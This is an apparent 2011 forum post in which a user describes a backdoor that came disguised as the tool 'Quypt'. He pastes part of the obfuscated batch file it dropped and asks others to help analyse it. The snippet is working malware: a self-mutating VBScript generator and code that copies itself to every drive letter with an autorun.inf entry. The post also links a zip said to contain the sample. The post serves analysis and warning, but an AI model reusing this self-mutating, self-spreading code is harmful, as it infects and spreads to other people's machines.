Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Sponsored by: █ Sparkhost - Hosting Without Compromises! █ Hybrid Performance Web Hosting █ Spark Host Stream Hosting █ Hybrid IRC & IRCd Server Shell Accounts

Quypt / Undeadnet

Started by AgentSmith15 , Apr 26 2011 01:14 AM

Please log in to reply

No replies to this topic

#1 AgentSmith15

Specialist

Members
130 posts

Posted 26 April 2011 - 01:14 AM

Ugh, I don't normally get caught running stupid stuff, but I was researching Quypt and supposedly it comes on Backtrack liveCD. So I did a google search and was lead to a forums (I linked below) to where they gave link to download it. Not knowing what it was I ran it and immediately noticed something off specially when I couldn't open task manager.

Anyways it looks like a backdoor, and it left a obfacted batch file in a temp directory. It does a whole bunch of policy changes, changing folder permissions, adding a user in the background, opens the firewall, shuts down windows defender and a whole bunch of AV. I haven't had time to look at the executable's but I am curious after seeing the batch file. Also a few AV's report this as a tool which grabs your SteamID.

The sites name in question is hxxp://quypt.proboards.com

Also I am kinda stumped on this little snippit of the batch file it left behind. Don't run.

ECHO randomize>>ovfsbeksodog.vbs
ECHO set gpkqtmrducqqqa=createobject("scripting.filesystemobject")>>ovfsbeksodog.vbs
ECHO set mpmnebrcflqhmsflapjfkq=gpkqtmrducqqqa.opentextfile(%0,1)>>ovfsbeksodog.vbs
ECHO eiqihufrjbfanaresgjh=mpmnebrcflqhmsflapjfkq.readall>>ovfsbeksodog.vbs
ECHO qdclllivmghlvehi="ksgphdvileffsjsu knfggeiqihufrjbfanaresgjhslgeovovfsbeksodogosedme vfolkghiqdnbjg ighkrktvitdm vddghactakajbtrl apaupfutdkopvlicbhtg pgsdkllfenlp ingnldakomrotskginhh eleavvtealtjkbvdjsquduepkucqmkoo rggcrjmlfdfdoippie semipvdqepmddjocscdj tokdknsmuuablhplam mbfpubkutohgaptqhtfchd oobpnukbunmtkgakhfjefh opqtmokeiqihufrjbfanaresgjhgoq dmolkjatnrpjbbfbkckqvk rnledlakfnsapd hjfameqfcedr uekaeearsascab ahnjksmkvlvusultjkbvdjsquduepk vcradmmovjbokonvemph ppidlbhjjekoglet  nchvsrinjocpropdtmak tluqaclqmuukdgrecd nrniurtairbe frucopeltdpstkfvjdcoll ulmkistquadtsm rtofbomvsmmbnlevofmk qaoqvugtrbhqfptbsk bjemmbacgfqf ilmojrstthqpap qeurmtfgcehboismofpp qiltjkbvdjsquduepkaqcbnmid eiqihufrjbfanaresgjh qdclllivmghlvehi aslennthoeej ltjkbvdjsquduepk ckietoflidgbbg rhduriekhocshmqb gpkqtmrducqqqa mpmnebrcflqhmsflapjfkq ovfsbeksodog":aslennthoeej=split(qdclllivmghlvehi," ")>>ovfsbeksodog.vbs
ECHO for each ltjkbvdjsquduepk in aslennthoeej>>ovfsbeksodog.vbs
ECHO for ckietoflidgbbg=1 to int(rnd*6)+6>>ovfsbeksodog.vbs
ECHO rhduriekhocshmqb=rhduriekhocshmqb+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>ovfsbeksodog.vbs
ECHO next>>ovfsbeksodog.vbs
ECHO eiqihufrjbfanaresgjh=replace(eiqihufrjbfanaresgjh,ltjkbvdjsquduepk,rhduriekhocshmqb):rhduriekhocshmqb="">>ovfsbeksodog.vbs
ECHO next>>ovfsbeksodog.vbs
ECHO set mpmnebrcflqhmsflapjfkq=gpkqtmrducqqqa.opentextfile(%0,2,1)>>ovfsbeksodog.vbs
ECHO mpmnebrcflqhmsflapjfkq.writeline eiqihufrjbfanaresgjh>>ovfsbeksodog.vbs
ECHO mpmnebrcflqhmsflapjfkq.close>>ovfsbeksodog.vbs
start ovfsbeksodog.vbs

for p in (b e f g h i j k l m n o p q r s t u v w x y z) do if exist p:%0 goto Non
for i In (b e f g h i j k l m n o p q r s t u v w x y z)  do type %0 > i:
ECHO [autorun] > i:\autorun.inf

Any ideas? Did I miss a set command somewhere? The batch is included in the zip file.

http://www.mediafire...al Emulator.zip

I was gonna write some C++, but then I got high
I was gonna skip all that .NET stuff, but then I got high,
Now I'm stuck with non-deterministic finalization, and I know why.
Because I got high, because I got high, because I got high.